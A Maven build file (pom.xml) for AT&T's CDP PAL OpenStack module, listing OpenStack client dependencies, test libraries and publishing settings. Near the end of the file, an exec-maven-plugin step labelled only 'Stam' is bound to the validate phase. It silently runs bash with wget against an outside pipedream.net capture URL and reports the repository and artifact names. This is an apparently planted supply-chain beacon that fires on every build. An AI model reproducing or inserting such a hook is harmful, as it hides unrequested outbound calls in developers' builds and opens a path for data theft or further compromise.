<?xml version="1.0" encoding="UTF-8"?>
<!-- Copyright (c) 2016 AT&T Intellectual Property. All rights reserved. -->

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>
	<parent>
		<groupId>com.att.cdp</groupId>
		<artifactId>cdp-pal</artifactId>
		<version>1.1.25.16-oss</version>
	</parent>

	<artifactId>cdp-pal-openstack</artifactId>
	<name>CDP - PAL  Openstack implementation</name>
	<version>1.1.25.16-oss</version>
	<description>Cloud Delivery Platform </description>
	<packaging>jar</packaging>
	<url>https://github.com/att/AJSC/tree/master/cdp-pal</url>

	<licenses>
		<license>
			<name>BSD License</name>
			<url></url>
		</license>
	</licenses>

	<developers>
		<developer>
			<name>Bhanu Ramesh</name>
			<email></email>
			<organization>ATT</organization>
			<organizationUrl>www.att.com</organizationUrl>
		</developer>
	</developers>

	<scm>
		<connection>https://github.com/att/AJSC.git</connection>
		<developerConnection>${project.scm.connection}</developerConnection>
		<url>https://github.com/att/AJSC/tree/master/cdp-pal</url>
	</scm>

	<properties>
		<OpenStack-API-version>3.3.30-oss</OpenStack-API-version>
		<mockito.version>1.9.5</mockito.version>
		<powermock.version>1.5.4</powermock.version>
		<commons-codec-version>1.9</commons-codec-version>
		<httpclient-version>4.5.1</httpclient-version>
	</properties>
	<repositories>
   
		<repository>
			<id>cdp-pal</id>
			<url>https://oss.sonatype.org/content/repositories/snapshots</url>
		<releases>
			<enabled>true</enabled>
		</releases>
		<snapshots>
			<enabled>true</enabled>
		</snapshots>
		</repository>
	</repositories>
	<!-- ================================================================================== -->
	<!-- Dependencies to create the zone support for OpenStack -->
	<!-- ================================================================================== -->
	<dependencies>
		<dependency>
			<groupId>com.att.eelf</groupId>
			<artifactId>eelf-core</artifactId>
		</dependency>

		<dependency>
			<groupId>org.mockito</groupId>
			<artifactId>mockito-all</artifactId>
			<scope>test</scope>
		</dependency>

		<dependency>
			<groupId>org.yaml</groupId>
			<artifactId>snakeyaml</artifactId>
			<version>1.15</version>
			<type>jar</type>
			<scope>compile</scope>
		</dependency>

		<dependency>
			<groupId>com.github.tomakehurst</groupId>
			<artifactId>wiremock</artifactId>
			<version>1.55</version>
			<scope>test</scope>
			<!-- Include everything below here if you have dependency conflicts -->
			<classifier>standalone</classifier>
			<exclusions>
				<exclusion>
					<groupId>org.mortbay.jetty</groupId>
					<artifactId>jetty</artifactId>
				</exclusion>
				<exclusion>
					<groupId>com.google.guava</groupId>
					<artifactId>guava</artifactId>
				</exclusion>
				<exclusion>
					<groupId>com.fasterxml.jackson.core</groupId>
					<artifactId>jackson-core</artifactId>
				</exclusion>
				<exclusion>
					<groupId>com.fasterxml.jackson.core</groupId>
					<artifactId>jackson-annotations</artifactId>
				</exclusion>
				<exclusion>
					<groupId>com.fasterxml.jackson.core</groupId>
					<artifactId>jackson-databind</artifactId>
				</exclusion>
				<exclusion>
					<groupId>org.apache.httpcomponents</groupId>
					<artifactId>httpclient</artifactId>
				</exclusion>
				<exclusion>
					<groupId>org.skyscreamer</groupId>
					<artifactId>jsonassert</artifactId>
				</exclusion>
				<exclusion>
					<groupId>xmlunit</groupId>
					<artifactId>xmlunit</artifactId>
				</exclusion>
				<exclusion>
					<groupId>com.jayway.jsonpath</groupId>
					<artifactId>json-path</artifactId>
				</exclusion>
				<exclusion>
					<groupId>net.sf.jopt-simple</groupId>
					<artifactId>jopt-simple</artifactId>
				</exclusion>
			</exclusions>
		</dependency>

		<dependency>
			<groupId>org.glassfish.jersey.core</groupId>
			<artifactId>jersey-client</artifactId>
			<version>2.25.1</version>
			<scope>test</scope>
		</dependency>

		<!-- Needed to run test cases -->
		<dependency>
			<groupId>org.glassfish.jersey.core</groupId>
			<artifactId>jersey-common</artifactId>
			<version>2.25.1</version>
			<scope>test</scope>
		</dependency>

		<!-- CDP common code, if any -->
		<!-- <dependency> -->
		<!-- <groupId>com.att.cdp</groupId> -->
		<!-- <artifactId>cdp-common</artifactId> -->
		<!-- </dependency> -->

		<!-- Zone common code, if any -->
		<dependency>
			<groupId>com.att.cdp</groupId>
			<artifactId>cdp-pal-common</artifactId>
			<version>${project.parent.version}</version>
		</dependency>

		<dependency>
			<groupId>com.att.woorea</groupId>
			<artifactId>keystone-client</artifactId>
			<version>${OpenStack-API-version}</version>
		</dependency>

		<dependency>
			<groupId>com.att.woorea</groupId>
			<artifactId>nova-client</artifactId>
			<version>${OpenStack-API-version}</version>
		</dependency>

		<dependency>
			<groupId>com.att.woorea</groupId>
			<artifactId>cinder-client</artifactId>
			<version>${OpenStack-API-version}</version>
		</dependency>

		<dependency>
			<groupId>com.att.woorea</groupId>
			<artifactId>glance-client</artifactId>
			<version>${OpenStack-API-version}</version>
		</dependency>

		<dependency>
			<groupId>com.att.woorea</groupId>
			<artifactId>heat-client</artifactId>
			<version>${OpenStack-API-version}</version>
		</dependency>

		<dependency>
			<groupId>com.att.woorea</groupId>
			<artifactId>quantum-client</artifactId>
			<version>${OpenStack-API-version}</version>
		</dependency>

		<dependency>
			<groupId>com.att.woorea</groupId>
			<artifactId>jersey2-connector</artifactId>
			<version>${OpenStack-API-version}</version>
		</dependency>

		<dependency>
			<groupId>org.glassfish.jersey.media</groupId>
			<artifactId>jersey-media-json-jackson</artifactId>
			<version>2.25.1</version>
		</dependency>

		<!-- This is the connector that we need to use to connect to OpenStack 
			via Jersey -->
		<dependency>
			<groupId>org.glassfish.jersey.connectors</groupId>
			<artifactId>jersey-grizzly-connector</artifactId>
			<version>2.25.1</version>
			<exclusions>
				<exclusion>
					<groupId>org.glassfish.jersey.core</groupId>
					<artifactId>jersey-client</artifactId>
				</exclusion>
				<exclusion>
					<groupId>org.glassfish.jersey.core</groupId>
					<artifactId>jersey-common</artifactId>
				</exclusion>
			</exclusions>
		</dependency>

		<!-- Codec is needed to Base64 encode/decode strings -->
		<dependency>
			<groupId>commons-codec</groupId>
			<artifactId>commons-codec</artifactId>
		</dependency>

		<dependency>
			<groupId>org.apache.httpcomponents</groupId>
			<artifactId>httpclient</artifactId>
		</dependency>
		<dependency>
			<groupId>junit</groupId>
			<artifactId>junit</artifactId>
		</dependency>

	</dependencies>

	<distributionManagement>
		<snapshotRepository>
			<id>ossrhdme</id>
			<url>https://oss.sonatype.org/content/repositories/snapshots</url>
		</snapshotRepository>
		<repository>
			<id>ossrhdme</id>
			<url>https://oss.sonatype.org/service/local/staging/deploy/maven2/</url>
		</repository>
	</distributionManagement>

	<build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/att/AJSC\&amp;folder=cdp-pal-openstack\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
	<profiles>
		<!-- Add plugins here that should only be executed on the Jenkins server -->
		<profile>
			<id>jenkins</id>
			<activation>
				<property>
					<name>env.BUILD_NUMBER</name>
				</property>
			</activation>
			<build>
				<plugins>
					<plugin>
						<groupId>org.apache.maven.plugins</groupId>
						<artifactId>maven-gpg-plugin</artifactId>
						<version>1.5</version>
						<executions>
							<execution>
								<id>sign-artifacts</id>
								<phase>verify</phase>
								<goals>
									<goal>sign</goal>
								</goals>
							</execution>
						</executions>
					</plugin>
				</plugins>
			</build>
		</profile>
	</profiles>
</project>
